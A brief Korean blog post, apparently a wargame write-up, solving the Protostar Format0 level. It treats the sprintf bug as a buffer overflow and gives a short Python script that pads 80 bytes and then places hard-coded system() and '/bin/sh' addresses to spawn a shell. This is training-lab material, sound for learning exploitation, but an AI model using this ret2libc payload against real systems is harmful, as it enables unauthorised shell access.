Wargame/Protostar:Exploit-Exercises
[Protostar : Exploit-Exercises] Format0
Choiys
2016. 9. 24. 07:14
sprintf 취약점을 이용한 BOF네요.
strcpy와 동일합니다.
값을 바꿔줍시다.
#coding: utf-8 from struct import pack, unpack p = lambda x: pack("<L", x) up = lambda x: pack("<L", x)[0] system = 0xb7ecffb0 binsh = 0xb7fb63bf payload = 'A'*80 payload += p(system) payload += 'BBBB' payload += p(binsh) print payload
format0.py
쉘도 따줍시다.